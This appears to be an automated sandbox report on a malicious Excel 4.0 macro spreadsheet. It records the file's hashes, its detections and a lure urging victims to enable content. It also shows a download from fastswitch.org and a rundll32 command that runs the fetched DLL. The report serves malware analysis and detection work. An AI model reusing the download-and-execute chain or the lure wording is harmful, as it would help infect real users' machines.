Loading ...

Play interactive tourEdit tour

Analysis Report document-1429954472.xls

Overview

General Information

Sample Name:document-1429954472.xls
Analysis ID:384830
MD5:de9de1ff91dd0501f1405ce027fb5941
SHA1:826804c571db7b1c892160c8c4c05c2d5d015d63
SHA256:26acece82b024fc2b5306a52189db24a8742c11cc9ebbc84ab6a5dca8672bc0c
Tags:SilentBuilderxls
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2248 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2552 cmdline: rundll32 ..\iojhsfgv.dvers,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1429954472.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4c2a2:$s1: Excel
  • 0x4d2f4:$s1: Excel
  • 0x38f2:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1429954472.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1429954472.xlsReversingLabs: Detection: 47%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
    Source: excel.exeMemory has grown: Private usage: 4MB later: 47MB
    Source: global trafficDNS query: name: fastswitch.org
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 47.244.191.15:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 47.244.191.15:80
    Source: global trafficHTTP traffic detected: GET /ds/0702.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fastswitch.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0702.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fastswitch.orgConnection: Keep-Alive
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: fastswitch.org
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Fri, 09 Apr 2021 20:09:42 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.31X-Powered-By: PHP/5.6.31Content-Length: 79Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 37 30 32 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /ds/0702.gif was not found on this server.
    Source: document-1429954472.xlsString found in binary or memory: http://fastswitch.org/ds/0702.gif
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 8Screenshot OCR: Enable Content X "" - (" jR " ^ Docu&nt THIS STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
    Source: Screenshot number: 12Screenshot OCR: Enable Content X J315 " '" jR " A B C D E F G H I J K L M N O P Q R S L=j 301 302 303 304 3
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1429954472.xlsInitial sample: EXEC
    Source: document-1429954472.xlsOLE indicator, VBA macros: true
    Source: document-1429954472.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal72.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\F0EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD7C8.tmpJump to behavior
    Source: document-1429954472.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
    Source: document-1429954472.xlsReversingLabs: Detection: 47%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1429954472.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1429954472.xls48%ReversingLabsDocument-Word.Trojan.Abracadabra

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://fastswitch.org/ds/0702.gif0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fastswitch.org
    47.244.191.15
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://fastswitch.org/ds/0702.giffalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpfalse
              high
              http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2102003804.0000000001D87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000003.00000002.2101785955.0000000001BA0000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  47.244.191.15
                  fastswitch.orgUnited States
                  45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                  General Information

                  Joe Sandbox Version:31.0.0 Emerald
                  Analysis ID:384830
                  Start date:09.04.2021
                  Start time:22:08:45
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 4m 57s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:document-1429954472.xls
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal72.expl.evad.winXLS@3/5@1/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/384830/sample/document-1429954472.xls

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCdocuments-351331057.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  documents-351331057.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  documents-1819557117.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  documents-1819557117.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  BvuKqSpgIG.exeGet hashmaliciousBrowse
                  • 198.11.132.10
                  3vQD6TIYA1.exeGet hashmaliciousBrowse
                  • 8.209.67.151
                  wininit.dllGet hashmaliciousBrowse
                  • 8.208.88.90
                  XN123gfQJQ.exeGet hashmaliciousBrowse
                  • 8.209.67.151
                  0408_391585988029.docGet hashmaliciousBrowse
                  • 8.208.88.90
                  msals.pumpl.dllGet hashmaliciousBrowse
                  • 8.208.88.90
                  BrgW593cHH.exeGet hashmaliciousBrowse
                  • 8.208.95.18
                  BrgW593cHH.exeGet hashmaliciousBrowse
                  • 8.208.95.18
                  WDnE51mua6.exeGet hashmaliciousBrowse
                  • 8.208.95.18
                  documents-2112491607.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  documents-1660683173.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  0406_37400496097832.docGet hashmaliciousBrowse
                  • 8.208.95.92
                  32_64_ver_2_bit.exeGet hashmaliciousBrowse
                  • 8.209.67.151
                  1234.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  12345.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209
                  1234.xlsmGet hashmaliciousBrowse
                  • 8.211.4.209

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\DEDE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):304486
                  Entropy (8bit):7.987710968119744
                  Encrypted:false
                  SSDEEP:6144:J4rFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Ms:J4FPM8R3AsB+bjej/9ch
                  MD5:B7E3BA7F477AAC44DE78E92775EEED28
                  SHA1:3C4149438C592697A5092AC7E0555ACB56370FD5
                  SHA-256:AFE0B5366D0EC38A0AB04352CD3A6EE7593F11E3FD3047B7DCAC95DD1AA6BCBC
                  SHA-512:52EE9132CA8B28FA51818E394C71192E2A0132CDD79DB4276E74D22A840638AF1FDAAB69F4D318624C8A505EF858CEDDB57894DF2ABD5147E53003704F7F9CC8
                  Malicious:false
                  Reputation:low
                  Preview: .T.n.0....?..........C....I?`L.%...a...;...5..Fr.B.-..........{q..D.^.m.._......^...{.E........0.S/...)I......*$.._. #.5.(?.f...>..m..b1..+x.........x.|.}W.z.1Z. .Q....H.V+.P........4.....&...s..H....G....e.4"..#..}..#k)4.H.8......9.q?......B.?.qZrc.SH.e...<I..Q......u.T.7...y...vxF."I....H....?.RI%..Q}_j.P...L...e....J3!Hyk..8.......].........>t..bA..^.....O..."..Jxy..^.md"L...O..A....G3..8.Oh.:..........PK..........!.I$ON............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Apr 10 04:09:42 2021, atime=Sat Apr 10 04:09:42 2021, length=8192, window=hide
                  Category:dropped
                  Size (bytes):867
                  Entropy (8bit):4.469388029914967
                  Encrypted:false
                  SSDEEP:12:85QZSpNcLgXg/XAlCPCHaX2B8GB/MUeX+WnicvbCLbDtZ3YilMMEpxRljKATdJP8:85MSpE/XTm6GKdYeWXDv3qNrNru/
                  MD5:80B2A8EBEAA88E11E4874EDC7B41CAD3
                  SHA1:69F63C5F862D22850E33F85766510008D92348D8
                  SHA-256:29E7017EC8AC9674E8BB46126FB26D8E6D602205BE9026DB349E35F5361F30DE
                  SHA-512:69B1838BAC4D4CCEC3683E8023BA95E6D41C3E32F82A1F861F6AE010C2F4BF0789ED3F41FF49424D0EA8FAF234C5D10A1F50760890ACE87B54F53331768E5A63
                  Malicious:false
                  Reputation:low
                  Preview: L..................F...........7G..1.Z..-..1.Z..-... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R6)..Desktop.d......QK.X.R6)*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1429954472.LNK
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Sat Apr 10 04:09:42 2021, atime=Sat Apr 10 04:09:43 2021, length=323072, window=hide
                  Category:dropped
                  Size (bytes):4236
                  Entropy (8bit):4.527511641219768
                  Encrypted:false
                  SSDEEP:96:8S/XJGqyNQh2S/XJGqyNQh2S/XJGqyNQh2S/XJGqyNQ/:8mGqsQEmGqsQEmGqsQEmGqsQ/
                  MD5:9C5D462A51C789DDD64418668E6C52A0
                  SHA1:EDC9AB1E91881B421FD8836B13BE1E5F511DDF9B
                  SHA-256:5389B72F31ACFED4B77181C6F8E728FE41013CEFB40498DB9A5B8645FB71E5C9
                  SHA-512:139F586B90C1D0DCA601800B7482E3F1CE9A417BD7FE0326C840AD37E28FB5F2FBA93D646D873FD32E775C873D33EE900DA996C036601748D23208E462292767
                  Malicious:false
                  Reputation:low
                  Preview: L..................F.... ....C$..{..1.Z..-....p..-...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R2) .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.2.9.9.5.4.4.7.2...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\document-1429954472.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.2.9.9.5.4.4.7.2...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):232
                  Entropy (8bit):4.748684856001104
                  Encrypted:false
                  SSDEEP:6:dj6Y9LDfSELDf6Y9LDfSELDf6Y9LDfSELDf6Y9LDfy:dmGfLf6GfLf6GfLf6Gfy
                  MD5:7017EBEEBA485CE008EB5293B9112C4D
                  SHA1:7442A6B35DF884CD49EC16D3DD4ED71146B94EF5
                  SHA-256:6E44F9EF52F364C3AD88CA0CBFB3ED5B5300DBEFD0FB2AF6A199082F54DB355E
                  SHA-512:403A358D37A6F1AF09638D5A8FF89962A5CDA61D08AF7052952E0D89BE85CB002DCE8F0436C1A9B4628FDEA29A5AD09F677CE9024354A1CF30809C3DD90FD5AD
                  Malicious:false
                  Reputation:low
                  Preview: Desktop.LNK=0..[xls]..document-1429954472.LNK=0..document-1429954472.LNK=0..[xls]..document-1429954472.LNK=0..document-1429954472.LNK=0..[xls]..document-1429954472.LNK=0..document-1429954472.LNK=0..[xls]..document-1429954472.LNK=0..
                  C:\Users\user\Desktop\F0EE0000
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Applesoft BASIC program data, first line number 16
                  Category:dropped
                  Size (bytes):359628
                  Entropy (8bit):7.418162021993312
                  Encrypted:false
                  SSDEEP:6144:xcKoSsxzNDZLDZjlbR868O8KL5L+od2xEtjPOtioVjDGUU1qfDlavx+W2QnAFVA7:1eLUIRfUI5uXL6nDJo2JPJ
                  MD5:61FAC44BC65739DA3CBBDCA76E6E2B84
